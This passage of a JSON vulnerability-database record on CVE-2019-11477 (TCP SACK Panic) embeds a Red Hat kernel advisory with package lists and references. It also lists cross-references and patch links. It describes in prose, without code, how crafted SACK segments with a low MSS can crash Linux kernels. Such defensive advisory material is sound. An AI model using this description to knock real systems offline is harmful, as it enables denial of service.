uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.3.4), redhat-virtualization-host\n(4.3.4). 7) - aarch64, noarch, ppc64le\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2019:1488-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:1488\nIssue date:        2019-06-17\nCVE Names:         CVE-2019-3896 CVE-2019-11477 CVE-2019-11478\n                   CVE-2019-11479\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. While processing SACK segments, the Linux kernel\u0027s socket buffer\n(SKB) data structure becomes fragmented. Each fragment is about TCP maximum\nsegment size (MSS) bytes. To efficiently process SACK blocks, the Linux\nkernel merges multiple fragmented SKBs into one, potentially overflowing\nthe variable holding the number of segments. A remote attacker could use\nthis flaw to crash the Linux kernel by sending a crafted sequence of SACK\nsegments on a TCP connection with small value of TCP MSS, resulting in a\ndenial of service (DoS). (CVE-2019-11477)\n\n* kernel: Double free in lib/idr.c (CVE-2019-3896)\n\n* Kernel: tcp: excessive resource consumption while processing SACK blocks\nallows remote denial of service (CVE-2019-11478)\n\n* Kernel: tcp: excessive resource consumption for TCP connections with low\nMSS allows remote denial of service (CVE-2019-11479)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* MDS mitigations not enabled on Intel Skylake CPUs (BZ#1710081)\n\n* RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1710121)\n\n* [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1710517)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1694812 - CVE-2019-3896 kernel: Double free in lib/idr.c\n1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service\n1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service\n1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-devel-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-headers-2.6.32-754.15.3.el6.ppc64.rpm\nperf-2.6.32-754.15.3.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm\nkernel-devel-2.6.32-754.15.3.el6.s390x.rpm\nkernel-headers-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-754.15.3.el6.s390x.rpm\nperf-2.6.32-754.15.3.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.15.3.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-2.6.32-754.15.3.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.15.3.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-2.6.32-754.15.3.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-754.15.3.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-headers-2.6.32-754.15.3.el6.i686.rpm\nperf-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.15.3.el6.noarch.rpm\nkernel-doc-2.6.32-754.15.3.el6.noarch.rpm\nkernel-firmware-2.6.32-754.15.3.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-devel-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-headers-2.6.32-754.15.3.el6.x86_64.rpm\nperf-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.15.3.el6.i686.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\npython-perf-2.6.32-754.15.3.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.15.3.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-2.6.32-754.15.3.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.15.3.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-3896\nhttps://access.redhat.com/security/cve/CVE-2019-11477\nhttps://access.redhat.com/security/cve/CVE-2019-11478\nhttps://access.redhat.com/security/cve/CVE-2019-11479\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/tcpsack\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXQfbBdzjgjWX9erEAQjjiw//QtCd50n/kyijAWgyi02UAPD+QrPWRv6a\ngLSESiQGCl7YvWgt96eI5DANREmFMWQ8wB0LRku4KJ4tutBdTcyouWrHgHEYhXLB\n24ZBi8HB/L9EhxKoQlHlY68ekZzbOcjqZhrL5K2xUnoVTJDo/+d+vtJgOIlrV/PC\naXxRL5nez5Y8pjCiwqm37RP7OUnn6daLtqcu42DR9XovXqORrfJVo43+5HR0drLA\nZB2B0ERUU+iFKpS6p9qIgfMLR9KRlMikeI+NRU/1JBjEDT5C4uT4fqULjM4a4QcR\n4Cm+wN6ku7CTK8l+1RAKSAn12KMjHUfMhWT1X0XFTFl3lFifL6o6+5D0OVSM68xL\nk+E8pmoilN1nFk49Z9uLDbCJogLbPdgSOZohiuYLBfUE4IUy0OiCodmKRlQBxWTK\ntYBMbUQ1stywEGngsFAXnF7BIeC346+uvMT83TlfbhV+TNIFARjwx9ySNrV7hLes\nenTzE250yv7LaZ0tXGKhoPXfLif7nFFVNzupV1PM3uHDCjLYLRq5JQcd1IWCrBS0\nIF5A/kp1X9zV8lO4fghj3aSXA7HwQphRBEJ4FkZSu34eqUX5rrC96X5T/8T9McOK\niOKT/z03WI1mSBJUrU/x7N2v44mXr0kropqd/Yfqf6KQDJWW3aXkJJWxNMgBqiYS\nl+p3rcEBzDA=NzJu\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-143127",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-11477",
        "trust": 3.2
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "153346",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/29/3",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/24/1",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/4",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/3",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/28/2",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/20/3",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-19-253-03",
        "trust": 1.7
      },
      {
        "db": "PULSESECURE",
        "id": "SA44193",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-462066",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10287",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153329",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "108801",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2171",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3564",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2155",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4528",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4316",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4255",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0736",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0342",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ASB-2019.0178.3",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-29592",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "153316",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "153430",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "153328",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "153424",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153324",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153320",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153327",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153317",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153321",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153318",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153315",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153323",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153325",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153322",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-143127",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11477",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153543",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153346"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "153328"
      },
      {
        "db": "PACKETSTORM",
        "id": "153543"
      },
      {
        "db": "PACKETSTORM",
        "id": "153430"
      },
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "id": "VAR-201906-1175",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:42:20.367000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=93875"
      },
      {
        "title": "Red Hat: Important: redhat-virtualization-host security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191594 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191485 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191484 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191480 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-lts-trusty, linux-lts-xenial vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4017-2"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191487 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4017-1"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191482 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191486 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191481 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191488 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191490 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191479 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
